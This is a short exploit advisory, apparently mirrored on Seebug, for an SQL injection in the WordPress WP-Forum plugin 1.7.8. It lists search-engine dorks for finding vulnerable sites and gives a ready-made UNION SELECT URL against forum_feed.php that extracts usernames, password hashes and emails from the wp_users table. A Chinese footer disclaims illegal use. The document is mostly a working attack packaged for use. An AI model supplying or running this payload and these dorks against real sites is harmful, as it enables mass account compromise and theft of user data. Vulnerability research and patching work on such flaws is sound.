----------------------------------------------------------------------------------------------- # Wordpress Wp-forum plugin 1.7.8 Sql injection vulnerability # ----------------------------------------------------------------------------------------------- Author: [[seomafia]] ######################### Dorks: allinurl:page_id inurl:showforum inurl:plugins/wp-forum "index of /" wp-forum ####################### Example : http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL] Exploit: http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/* ####################### Greetz: Exploit.In
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论